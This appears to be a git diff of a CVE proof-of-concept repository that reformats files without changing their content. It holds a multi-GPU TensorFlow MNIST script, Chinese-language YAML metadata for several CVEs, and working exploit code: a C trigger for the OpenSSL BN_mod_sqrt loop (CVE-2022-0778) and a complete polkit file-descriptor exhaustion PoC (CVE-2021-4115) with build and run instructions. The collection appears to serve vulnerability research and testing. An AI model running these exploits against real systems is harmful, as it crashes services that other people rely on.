-        var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
-    return var
-
-def build_model():
-
-    def multilayer_perceptron(x, weights, biases):
-        layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
-        layer_1 = tf.nn.relu(layer_1)
-
-        layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
-        layer_2 = tf.nn.relu(layer_2)
-
-        out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
-        return out_layer
-
-    with tf.variable_scope('aaa'):
-        weights = {
-        'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()),
-        'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()),
-        'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer())
-          }
-        biases = {
-        'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()),
-        'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()),
-        'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer())
-          }
-
-        pred = multilayer_perceptron(x, weights, biases)
-
-        cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))
-    return cost,pred
-
-
-def average_gradients(tower_grads):
-  average_grads = []
-  for grad_and_vars in zip(*tower_grads):
-    grads = []
-    for g,_ in grad_and_vars:
-      expanded_g = tf.expand_dims(g, 0)
-      grads.append(expanded_g)
-    grad = tf.concat(axis=0, values=grads)
-    grad = tf.reduce_mean(grad, 0)
-    v = grad_and_vars[0][1]
-    grad_and_var = (grad, v)
-    average_grads.append(grad_and_var)
-  return average_grads
-
-
-with tf.Graph().as_default(), tf.device('/cpu:0'):
-    x = tf.placeholder("float", [None, n_input])
-    y = tf.placeholder("float", [None, n_classes])
-    tower_grads = []
-    optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
-    local_device_protos = device_lib.list_local_devices()
-    num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU'])
-    with tf.variable_scope(tf.get_variable_scope()):
-      for i in xrange(num_gpus):
-        with tf.device('/gpu:%d' % i):
-                cost,pred = build_model()
-                tf.get_variable_scope().reuse_variables()
-                grads = optimizer.compute_gradients(cost)
-                tower_grads.append(grads)
-
-    grads = average_gradients(tower_grads)
-    apply_gradient_op = optimizer.apply_gradients(grads)
-    train_op = apply_gradient_op
-
-    init = tf.global_variables_initializer()
-    sess = tf.Session()
-    sess.run(init)
-
-    for step in range(training_steps):
-            image_batch, label_batch = mnist.train.next_batch(batch_size)
-            _, cost_print = sess.run([train_op, cost],
-                                     {x:image_batch,
-                                      y:label_batch})
-
-            if step % display_step == 0:
-                print("step=%04d" % (step+1)+  " cost=" + str(cost_print))
-    print("Optimization Finished!")
-    correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
-    accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
-    with sess.as_default():
-      print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))
+# coding=utf-8
+from tensorflow.examples.tutorials.mnist import input_data
+from tensorflow.python.client import device_lib
+
+mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
+
+import tensorflow as tf
+
+learning_rate = 0.001
+training_steps = 8250
+batch_size = 100
+display_step = 100
+
+n_hidden_1 = 256
+n_hidden_2 = 256
+n_input = 784
+n_classes = 10
+
+def _variable_on_cpu(name, shape, initializer):
+    with tf.device('/cpu:0'):
+        dtype = tf.float32
+        var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
+    return var
+
+def build_model():
+
+    def multilayer_perceptron(x, weights, biases):
+        layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
+        layer_1 = tf.nn.relu(layer_1)
+
+        layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
+        layer_2 = tf.nn.relu(layer_2)
+
+        out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
+        return out_layer
+
+    with tf.variable_scope('aaa'):
+        weights = {
+        'h1': _variable_on_cpu('h1',[n_input, n_hidden_1],tf.random_normal_initializer()),
+        'h2': _variable_on_cpu('h2',[n_hidden_1, n_hidden_2],tf.random_normal_initializer()),
+        'out': _variable_on_cpu('out_w',[n_hidden_2, n_classes],tf.random_normal_initializer())
+          }
+        biases = {
+        'b1': _variable_on_cpu('b1',[n_hidden_1],tf.random_normal_initializer()),
+        'b2': _variable_on_cpu('b2',[n_hidden_2],tf.random_normal_initializer()),
+        'out': _variable_on_cpu('out_b',[n_classes],tf.random_normal_initializer())
+          }
+
+        pred = multilayer_perceptron(x, weights, biases)
+
+        cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))
+    return cost,pred
+
+
+def average_gradients(tower_grads):
+  average_grads = []
+  for grad_and_vars in zip(*tower_grads):
+    grads = []
+    for g,_ in grad_and_vars:
+      expanded_g = tf.expand_dims(g, 0)
+      grads.append(expanded_g)
+    grad = tf.concat(axis=0, values=grads)
+    grad = tf.reduce_mean(grad, 0)
+    v = grad_and_vars[0][1]
+    grad_and_var = (grad, v)
+    average_grads.append(grad_and_var)
+  return average_grads
+
+
+with tf.Graph().as_default(), tf.device('/cpu:0'):
+    x = tf.placeholder("float", [None, n_input])
+    y = tf.placeholder("float", [None, n_classes])
+    tower_grads = []
+    optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
+    local_device_protos = device_lib.list_local_devices()
+    num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU'])
+    with tf.variable_scope(tf.get_variable_scope()):
+      for i in xrange(num_gpus):
+        with tf.device('/gpu:%d' % i):
+                cost,pred = build_model()
+                tf.get_variable_scope().reuse_variables()
+                grads = optimizer.compute_gradients(cost)
+                tower_grads.append(grads)
+
+    grads = average_gradients(tower_grads)
+    apply_gradient_op = optimizer.apply_gradients(grads)
+    train_op = apply_gradient_op
+
+    init = tf.global_variables_initializer()
+    sess = tf.Session()
+    sess.run(init)
+
+    for step in range(training_steps):
+            image_batch, label_batch = mnist.train.next_batch(batch_size)
+            _, cost_print = sess.run([train_op, cost],
+                                     {x:image_batch,
+                                      y:label_batch})
+
+            if step % display_step == 0:
+                print("step=%04d" % (step+1)+  " cost=" + str(cost_print))
+    print("Optimization Finished!")
+    correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
+    accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
+    with sess.as_default():
+      print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))
     sess.close()
\ No newline at end of file
diff --git a/cve/nvidia/2021/CVE-2021-1056/util.sh b/cve/nvidia/2021/CVE-2021-1056/util.sh
index edadd3aa..495da6a5 100644
--- a/cve/nvidia/2021/CVE-2021-1056/util.sh
+++ b/cve/nvidia/2021/CVE-2021-1056/util.sh
@@ -1,13 +1,13 @@
-#!/usr/bin/env bash
-
-function util::get_gpu_num() {
-    echo "$(nvidia-smi -L | wc -l)"
-}
-
-function util::log_info() {
-    echo "[INFO] $1"
-}
-
-function util::log_debug() {
-    echo "[DEBUG] $1"
+#!/usr/bin/env bash
+
+function util::get_gpu_num() {
+    echo "$(nvidia-smi -L | wc -l)"
+}
+
+function util::log_info() {
+    echo "[INFO] $1"
+}
+
+function util::log_debug() {
+    echo "[DEBUG] $1"
 }
\ No newline at end of file
diff --git a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml
index 40d10b98..2e7920f2 100644
--- a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml
+++ b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml
@@ -1,23 +1,23 @@
-id: CVE-2021-1056
-source: https://github.com/pokerfaceSad/CVE-2021-1056
-info:
-  name: NVIDIA提供了针对Linux系统的官方显卡驱动程序，这些驱动程序包括内核模块、用户空间库和命令行工具，可以与Linux操作系统集成，提供高性能的图形加速和计算能力。
-  severity: High
-  description: |
-    漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动，攻击者利用这个漏洞，在容器中创建特殊的字符设备文件后，能够获取宿主机上所有GPU设备的访问权限。
-    适用于Linux的 NVIDIA GPU显示驱动程序，所有版本，都包含内核模式层 (nvidia.ko) 中的一个漏洞，在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离，这可能会导致拒绝服务 或信息披露。
-  scope-of-influence:
-    nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03.
-  reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056
-    - https://nvidia.custhelp.com/app/answers/detail/a_id/5142
-    - https://ubuntu.com/security/notices/USN-4689-1
-    - https://ubuntu.com/security/notices/USN-4689-2
-    - https://ubuntu.com/security/CVE-2021-1056
-    - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056
-  classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
-    cvss-score: 7.1
-    cve-id: CVE-2021-1056
-    cwe-id: CWE-276
+id: CVE-2021-1056
+source: https://github.com/pokerfaceSad/CVE-2021-1056
+info:
+  name: NVIDIA提供了针对Linux系统的官方显卡驱动程序，这些驱动程序包括内核模块、用户空间库和命令行工具，可以与Linux操作系统集成，提供高性能的图形加速和计算能力。
+  severity: High
+  description: |
+    漏洞CVE-2021-1056是NVIDIA GPU驱动程序与设备隔离相关的安全漏洞。当容器以非特权模式启动，攻击者利用这个漏洞，在容器中创建特殊的字符设备文件后，能够获取宿主机上所有GPU设备的访问权限。
+    适用于Linux的 NVIDIA GPU显示驱动程序，所有版本，都包含内核模式层 (nvidia.ko) 中的一个漏洞，在该漏洞中它不完全遵守操作系统文件系统权限以提供 GPU 设备级隔离，这可能会导致拒绝服务 或信息披露。
+  scope-of-influence:
+    nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056
+    - https://nvidia.custhelp.com/app/answers/detail/a_id/5142
+    - https://ubuntu.com/security/notices/USN-4689-1
+    - https://ubuntu.com/security/notices/USN-4689-2
+    - https://ubuntu.com/security/CVE-2021-1056
+    - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
+    cvss-score: 7.1
+    cve-id: CVE-2021-1056
+    cwe-id: CWE-276
   tags: 权限提升, 拒绝服务, 信息泄漏, cve2021
\ No newline at end of file
diff --git a/cve/openssl/2022/CVE-2022-0778/bad_BN.c b/cve/openssl/2022/CVE-2022-0778/bad_BN.c
index 34247ac8..6fbf819b 100644
--- a/cve/openssl/2022/CVE-2022-0778/bad_BN.c
+++ b/cve/openssl/2022/CVE-2022-0778/bad_BN.c
@@ -1,22 +1,22 @@
-#include <openssl/bn.h>
-
-
-int main() {
-    BN_CTX *ctx;
-    ctx = BN_CTX_new();
-    BIGNUM *res, *a, *p;
-    res = BN_CTX_get(ctx);
-    a = BN_CTX_get(ctx);
-    p = BN_CTX_get(ctx);
-
-    BN_dec2bn(&p, "697");
-    BN_dec2bn(&a, "696");
-
-    printf("p = %s\n", BN_bn2dec(p));
-    printf("a = %s\n", BN_bn2dec(a));
-
-    BIGNUM* check = BN_mod_sqrt(res, a, p, ctx);
-    printf("%s\n", BN_bn2dec(res));
-
-    return 0;
+#include <openssl/bn.h>
+
+
+int main() {
+    BN_CTX *ctx;
+    ctx = BN_CTX_new();
+    BIGNUM *res, *a, *p;
+    res = BN_CTX_get(ctx);
+    a = BN_CTX_get(ctx);
+    p = BN_CTX_get(ctx);
+
+    BN_dec2bn(&p, "697");
+    BN_dec2bn(&a, "696");
+
+    printf("p = %s\n", BN_bn2dec(p));
+    printf("a = %s\n", BN_bn2dec(a));
+
+    BIGNUM* check = BN_mod_sqrt(res, a, p, ctx);
+    printf("%s\n", BN_bn2dec(res));
+
+    return 0;
 }
\ No newline at end of file
diff --git a/cve/openssl/2022/yaml/CVE-2022-3786.yaml b/cve/openssl/2022/yaml/CVE-2022-3786.yaml
index c532b8a2..f34c7ba9 100644
--- a/cve/openssl/2022/yaml/CVE-2022-3786.yaml
+++ b/cve/openssl/2022/yaml/CVE-2022-3786.yaml
@@ -1,19 +1,19 @@
-id: CVE-2022-3786
-source: https://github.com/WhatTheFuzz/openssl-fuzz
-info:
-  name: 在TLS客户端中，通过连接到恶意服务器来触发漏洞。如果服务器请求客户端身份验证而恶意客户端连接，触发OpenSSL缓冲区溢出漏洞。
-  severity: High
-  description: |
-    在X.509证书验证中，特别是在名称约束检查中，可能会触发缓冲区溢出。这种情况发生在证书链签名验证之后，并且要求CA已经签署了恶意证书，或者要求应用程序在无法构造到受信任的颁发者的路径的情况下继续进行证书验证。攻击者可以在证书中伪造一个恶意的电子邮件地址来溢出任意数量的字节，其中包含'。'字符(十进制46)。缓冲区溢出可能导致崩溃(导致拒绝服务)。
-  scope-of-influence:
-    3.0.0 <= OpenSSL <= 3.0.6
-  reference:
-    https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c42165b5706e42f67ef8ef4c351a9a4c5d21639a
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
-    cvss-score: 7.5
-    cve-id: CVE-2022-3786
-    cwe-id: CWE-120 
-    cnvd-id: None 
-    kve-id: None 
+id: CVE-2022-3786
+source: https://github.com/WhatTheFuzz/openssl-fuzz
+info:
+  name: 在TLS客户端中，通过连接到恶意服务器来触发漏洞。如果服务器请求客户端身份验证而恶意客户端连接，触发OpenSSL缓冲区溢出漏洞。
+  severity: High
+  description: |
+    在X.509证书验证中，特别是在名称约束检查中，可能会触发缓冲区溢出。这种情况发生在证书链签名验证之后，并且要求CA已经签署了恶意证书，或者要求应用程序在无法构造到受信任的颁发者的路径的情况下继续进行证书验证。攻击者可以在证书中伪造一个恶意的电子邮件地址来溢出任意数量的字节，其中包含'。'字符(十进制46)。缓冲区溢出可能导致崩溃(导致拒绝服务)。
+  scope-of-influence:
+    3.0.0 <= OpenSSL <= 3.0.6
+  reference:
+    https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c42165b5706e42f67ef8ef4c351a9a4c5d21639a
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2022-3786
+    cwe-id: CWE-120 
+    cnvd-id: None 
+    kve-id: None 
   tags: 缓冲区溢出, CVE-2022
\ No newline at end of file
diff --git a/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt b/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt
index c76a99b7..5ecd18e9 100644
--- a/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt
+++ b/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt
@@ -1,30 +1,30 @@
-cmake_minimum_required(VERSION 3.10)
-
-enable_testing()
-
-# set the project name
-project(GHSL-2021-077-polkit VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-077: file descriptor exhaustion in polkit")
-
-# specify the C++ standard
-set(CMAKE_CXX_STANDARD 17)
-set(CMAKE_CXX_STANDARD_REQUIRED True)
-
-option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF)
-
-add_compile_options(-Wall -Wextra -pedantic -Werror)
-
-if (USE_SANITIZERS)
-  set(SANITIZER_FLAGS "-fsanitize=address,undefined")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}")
-  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}")
-  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
-  set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
-endif()
-
-add_subdirectory(DBusParse)
-
-add_executable(locksessions locksessions.cpp)
-target_link_libraries(locksessions PUBLIC DBusParse DBusParseUtils crypt)
-target_include_directories(
-        locksessions PRIVATE
-        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/DBusParse/include/DBusParse>)
+cmake_minimum_required(VERSION 3.10)
+
+enable_testing()
+
+# set the project name
+project(GHSL-2021-077-polkit VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-077: file descriptor exhaustion in polkit")
+
+# specify the C++ standard
+set(CMAKE_CXX_STANDARD 17)
+set(CMAKE_CXX_STANDARD_REQUIRED True)
+
+option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF)
+
+add_compile_options(-Wall -Wextra -pedantic -Werror)
+
+if (USE_SANITIZERS)
+  set(SANITIZER_FLAGS "-fsanitize=address,undefined")
+  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}")
+  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}")
+  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+  set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+endif()
+
+add_subdirectory(DBusParse)
+
+add_executable(locksessions locksessions.cpp)
+target_link_libraries(locksessions PUBLIC DBusParse DBusParseUtils crypt)
+target_include_directories(
+        locksessions PRIVATE
+        $<BUILD_INTERFACE:${PROJECT_SOURCE_DIR}/DBusParse/include/DBusParse>)
diff --git a/cve/polkit/2021/CVE-2021-4115/README.md b/cve/polkit/2021/CVE-2021-4115/README.md
index 5f7d84a9..f8168c41 100644
--- a/cve/polkit/2021/CVE-2021-4115/README.md
+++ b/cve/polkit/2021/CVE-2021-4115/README.md
@@ -1,52 +1,52 @@
-Copyright 2021 Kevin Backhouse.
-
-# GHSL-2021-077
-
-This repository contains a proof of concept exploit for GHSL-2021-077:
-file descriptor exhaustion in
-[polkit](https://gitlab.freedesktop.org/polkit/polkit).
-
-# Build
-
-Instructions for building the PoC:
-
-```bash
-git submodule update --init  # Download https://github.com/kevinbackhouse/DBusParse
-mkdir build
-cd build
-cmake ..
-make
-```
-
-# Running
-
-The PoC causes polkit to leak eventfd file descriptors. After several runs
-of the PoC, polkit will leak so many file descriptors that it will crash
-due to exceeding its quota of file descriptors.
-
-First, check how many file descriptors polkit has open:
-
-```bash
-$ sudo ls -l /proc/`pidof polkitd`/fd | wc
-     12     123     680
-```
-
-Now run the PoC:
-
-```bash
-./locksessions /var/run/dbus/system_bus_socket 0x4000
-```
-
-(The PoC is named locksessions because it calls the
-org.freedesktop.login1.Manager.LockSessions D-Bus method.)
-
-Now check again how many file descriptors polkit has open:
-
-```
-$ sudo ls -l /proc/`pidof polkitd`/fd | wc
-    255    2796   16872
-```
-
-Notice that a large number of eventfd file descriptors have been
-leaked. After few more runs of the PoC, polkit will most likely
-crash.
+Copyright 2021 Kevin Backhouse.
+
+# GHSL-2021-077
+
+This repository contains a proof of concept exploit for GHSL-2021-077:
+file descriptor exhaustion in
+[polkit](https://gitlab.freedesktop.org/polkit/polkit).
+
+# Build
+
+Instructions for building the PoC:
+
+```bash
+git submodule update --init  # Download https://github.com/kevinbackhouse/DBusParse
+mkdir build
+cd build
+cmake ..
+make
+```
+
+# Running
+
+The PoC causes polkit to leak eventfd file descriptors. After several runs
+of the PoC, polkit will leak so many file descriptors that it will crash
+due to exceeding its quota of file descriptors.
+
+First, check how many file descriptors polkit has open:
+
+```bash
+$ sudo ls -l /proc/`pidof polkitd`/fd | wc
+     12     123     680
+```
+
+Now run the PoC:
+
+```bash
+./locksessions /var/run/dbus/system_bus_socket 0x4000
+```
+
+(The PoC is named locksessions because it calls the
+org.freedesktop.login1.Manager.LockSessions D-Bus method.)
+
+Now check again how many file descriptors polkit has open:
+
+```
+$ sudo ls -l /proc/`pidof polkitd`/fd | wc
+    255    2796   16872
+```
+
+Notice that a large number of eventfd file descriptors have been
+leaked. After few more runs of the PoC, polkit will most likely
+crash.
diff --git a/cve/polkit/2021/CVE-2021-4115/locksessions.cpp b/cve/polkit/2021/CVE-2021-4115/locksessions.cpp
index 2046cc8a..5c036a26 100644
--- a/cve/polkit/2021/CVE-2021-4115/locksessions.cpp
+++ b/cve/polkit/2021/CVE-2021-4115/locksessions.cpp
@@ -1,111 +1,111 @@
-// Copyright 2021 Kevin Backhouse.
-//
-// This file is part of GHSL-2021-077-polkit.
-//
-// GHSL-2021-077-polkit is free software: you can redistribute it and/or modify
-// it under the terms of the GNU General Public License as published by
-// the Free Software Foundation, either version 3 of the License, or
-// (at your option) any later version.
-//
-// GHSL-2021-077-polkit is distributed in the hope that it will be useful,
-// but WITHOUT ANY WARRANTY; without even the implied warranty of
-// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-// GNU General Public License for more details.
-//
-// You should have received a copy of the GNU General Public License
-// along with GHSL-2021-077-polkit.  If not, see <https://www.gnu.org/licenses/>.
-
-
-#include "dbus_utils.hpp"
-#include "dbus_auth.hpp"
-#include "utils.hpp"
-#include <sys/socket.h>
-#include <sys/un.h>
-#include <unistd.h>
-
-class DBusSocket : public AutoCloseFD {
-public:
-  DBusSocket(const uid_t uid, const char* filename) :
-    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
-  {
-    if (get() < 0) {
-      throw ErrorWithErrno("Could not create socket");
-    }
-
-    sockaddr_un address;
-    memset(&address, 0, sizeof(address));
-    address.sun_family = AF_UNIX;
-    strcpy(address.sun_path, filename);
-
-    if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
-      throw ErrorWithErrno("Could not connect socket");
-    }
-
-    dbus_sendauth(uid, get());
-
-    dbus_send_hello(get());
-    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
-    std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
-    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
-  }
-};
-
-static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) {
-  dbus_method_call(
-    fd,
-    serialNumber,
-    DBusMessageBody::mk0(),
-    _s("/org/freedesktop/login1"),
-    _s("org.freedesktop.login1.Manager"),
-    _s("org.freedesktop.login1"),
-    _s("LockSessions")
-  );
-}
-
-// Keep trying `attempt_LockSessions_with_disconnect` with different
-// delay values until the exploit succeeds (or we decide to give up).
-static void exploit_LockSessions(
-  const uid_t uid,
-  const char* filename,
-  const long n
-) {
-  DBusSocket fd(uid, filename);
-
-  for (long i = 0; i < n; i++) {
-    send_logind_LockSessions(fd.get(), i+1);
-  }
-}
-
-static void usage(const char* progname) {
-  fprintf(
-    stderr,
-    "usage:   %s <unix socket path> <number of messages to send>\n"
-    "example: %s /var/run/dbus/system_bus_socket 4096\n",
-    progname,
-    progname
-  );
-}
-
-int main(int argc, char* argv[]) {
-  const char* progname = argc > 0 ? argv[0] : "a.out";
-  if (argc != 3) {
-    usage(progname);
-    return EXIT_FAILURE;
-  }
-
-  char* endptr = 0;
-  const long n = strtol(argv[2], &endptr, 0);
-  if (endptr == argv[2] || *endptr != '\0') {
-    usage(progname);
-    return EXIT_FAILURE;
-  }
-
-  const uid_t uid = getuid();
-  const char* filename = argv[1];
-
-  for (size_t i = 0; i < 1; i++) {
-    exploit_LockSessions(uid, filename, n);
-  }
-
-  return EXIT_SUCCESS;
-}
+// Copyright 2021 Kevin Backhouse.
+//
+// This file is part of GHSL-2021-077-polkit.
+//
+// GHSL-2021-077-polkit is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// GHSL-2021-077-polkit is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with GHSL-2021-077-polkit.  If not, see <https://www.gnu.org/licenses/>.
+
+
+#include "dbus_utils.hpp"
+#include "dbus_auth.hpp"
+#include "utils.hpp"
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <unistd.h>
+
+class DBusSocket : public AutoCloseFD {
+public:
+  DBusSocket(const uid_t uid, const char* filename) :
+    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
+  {
+    if (get() < 0) {
+      throw ErrorWithErrno("Could not create socket");
+    }
+
+    sockaddr_un address;
+    memset(&address, 0, sizeof(address));
+    address.sun_family = AF_UNIX;
+    strcpy(address.sun_path, filename);
+
+    if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
+      throw ErrorWithErrno("Could not connect socket");
+    }
+
+    dbus_sendauth(uid, get());
+
+    dbus_send_hello(get());
+    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
+    std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
+    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
+  }
+};
+
+static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) {
+  dbus_method_call(
+    fd,
+    serialNumber,
+    DBusMessageBody::mk0(),
+    _s("/org/freedesktop/login1"),
+    _s("org.freedesktop.login1.Manager"),
+    _s("org.freedesktop.login1"),
+    _s("LockSessions")
+  );
+}
+
+// Keep trying `attempt_LockSessions_with_disconnect` with different
+// delay values until the exploit succeeds (or we decide to give up).
+static void exploit_LockSessions(
+  const uid_t uid,
+  const char* filename,
+  const long n
+) {
+  DBusSocket fd(uid, filename);
+
+  for (long i = 0; i < n; i++) {
+    send_logind_LockSessions(fd.get(), i+1);
+  }
+}
+
+static void usage(const char* progname) {
+  fprintf(
+    stderr,
+    "usage:   %s <unix socket path> <number of messages to send>\n"
+    "example: %s /var/run/dbus/system_bus_socket 4096\n",
+    progname,
+    progname
+  );
+}
+
+int main(int argc, char* argv[]) {
+  const char* progname = argc > 0 ? argv[0] : "a.out";
+  if (argc != 3) {
+    usage(progname);
+    return EXIT_FAILURE;
+  }
+
+  char* endptr = 0;
+  const long n = strtol(argv[2], &endptr, 0);
+  if (endptr == argv[2] || *endptr != '\0') {
+    usage(progname);
+    return EXIT_FAILURE;
+  }
+
+  const uid_t uid = getuid();
+  const char* filename = argv[1];
+
+  for (size_t i = 0; i < 1; i++) {
+    exploit_LockSessions(uid, filename, n);
+  }
+
+  return EXIT_SUCCESS;
+}
diff --git a/cve/polkit/2021/yaml/CVE-2021-4115.yaml b/cve/polkit/2021/yaml/CVE-2021-4115.yaml
index 6b342c54..335c9413 100644
--- a/cve/polkit/2021/yaml/CVE-2021-4115.yaml
+++ b/cve/polkit/2021/yaml/CVE-2021-4115.yaml
@@ -1,23 +1,23 @@
-id: CVE-2021-4115
-source: https://github.com/github/securitylab/tree/main/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115
-info:
-  name: Polkit（PolicyKit）是类Unix系统中一个应用程序级别的工具集，通过定义和审核权限规则，实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分，可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。
-  severity: Medium
-  description: |
-    Polkit 存在资源管理错误漏洞，该漏洞源于进程文件描述符耗尽，攻击者利用该漏洞允许非特权用户导致polkit崩溃。
-  scope-of-influence:
-    polkit = 0.117	
-  reference:
-    - https://access.redhat.com/security/cve/cve-2021-4115
-    - https://gitlab.com/redhat/centos-stream/rpms/polkit/-/merge_requests/6/diffs?commit_id=bf900df04dc390d389e59aa10942b0f2b15c531e
-    - https://gitlab.freedesktop.org/polkit/polkit/-/issues/141
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VGKWCBS6IDZYYDYM2WIWJM5BL7QQTWPF/
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-  classification:
-    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
-    cvss-score: 5.5
-    cve-id: CVE-2021-4115
-    cwe-id: CWE-400
-    cnvd-id: None
-    kve-id: None
+id: CVE-2021-4115
+source: https://github.com/github/securitylab/tree/main/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115
+info:
+  name: Polkit（PolicyKit）是类Unix系统中一个应用程序级别的工具集，通过定义和审核权限规则，实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分，可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。
+  severity: Medium
+  description: |
+    Polkit 存在资源管理错误漏洞，该漏洞源于进程文件描述符耗尽，攻击者利用该漏洞允许非特权用户导致polkit崩溃。
+  scope-of-influence:
+    polkit = 0.117	
+  reference:
+    - https://access.redhat.com/security/cve/cve-2021-4115
+    - https://gitlab.com/redhat/centos-stream/rpms/polkit/-/merge_requests/6/diffs?commit_id=bf900df04dc390d389e59aa10942b0f2b15c531e
+    - https://gitlab.freedesktop.org/polkit/polkit/-/issues/141
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VGKWCBS6IDZYYDYM2WIWJM5BL7QQTWPF/
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+    cvss-score: 5.5
+    cve-id: CVE-2021-4115
+    cwe-id: CWE-400
+    cnvd-id: None
+    kve-id: None
